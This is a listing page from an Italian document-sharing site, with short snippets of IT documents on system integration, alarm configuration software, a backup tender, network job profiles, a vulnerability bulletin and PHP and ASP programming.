La nostra esperienza come System Integrator ci permette di seguire i clienti su uno spettro variegato di problematiche di supporto e integrazione: Sintek Technology nasce a Jesi nel luglio del 2004 da un pool di professionisti giovani ma con oltre 15 anni di esperienza nel settore IT. L origine risale però al giugno del 1998 come Sintech (acronimo

Dettagli

Installazione Configuration Software

Installazione Configuration Software 1 Guida rapida Installazione Configuration Software per Agility e LightSYS e ProSYS Plus Il Software di Configurazione RISCO è un applicativo basato su Windows con interfaccia multi-lingue semplice e intuitiva

Dettagli

(SINTESI DELL APPALTO)

(SINTESI DELL APPALTO) GARA EUROPEA Progetto di consolidamento dei sistemi di backup dei Data Base del GSE (SINTESI DELL APPALTO) Pagina 1 di 6 INDICE 1. CARATTERISTICHE DEL SISTEMA INFORMATICO DEL GSE... 3 2. PROGETTO DI CONSOLIDAMENTO

Dettagli

Tecnico sistemista di reti

Tecnico sistemista di reti Denominazione Figura / Profilo / Obiettivo Professioni NUP/ISTAT correlate Tecnico sistemista di reti 3.1.2.5.0 - Tecnici gestori di reti e di sistemi telematici 2.1.1.5.1 - Specialisti in reti e comunicazioni

Dettagli

Early Warning. Bollettino VA-IT-130708-01.A

Early Warning. Bollettino VA-IT-130708-01.A Early Warning Bollettino VA-IT-130708-01.A Guida alla corretta lettura della scheda riassuntiva Early Warning - Bollettino VA-IT-130708-01.A Pag. 2/6 P U B L I C CORRISPONDENZE EARLY WARNING INFORMAZIONI

Dettagli

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior

Dettagli

Guida di orientamento della documentazione di Business Objects BI Server

Guida di orientamento della documentazione di Business Objects BI Server Guida di orientamento della documentazione di Business Objects BI Server Panoramica Panoramica è basato su tecnologia BusinessObjects Enterprise, pertanto per ulteriori informazioni sull'utilizzo di Business

Dettagli

APPLICAZIONI WEB E INTRANET CON PHP

APPLICAZIONI WEB E INTRANET CON PHP APPLICAZIONI WEB E INTRANET CON PHP Novembre 2005 Dott. Ing. Bianchini Stefano Funzioni per stringhe in Php In Php esistono varie funzioni per elaborare stringhe: Crittazione,lunghezza, reverse, conversioni

Dettagli

ASP: ESERCIZI E SOLUZIONI

ASP: ESERCIZI E SOLUZIONI Autore: Classe: Nicola Ceccon QUINTA INFORMATICA (5IA) Anno scolastico: 2003/2004 Scuola: Itis Euganeo ASP: ESERCIZI E SOLUZIONI Esercizi Si propongono tre esercizi in ASP che prevedono l'utilizzo di un

Dettagli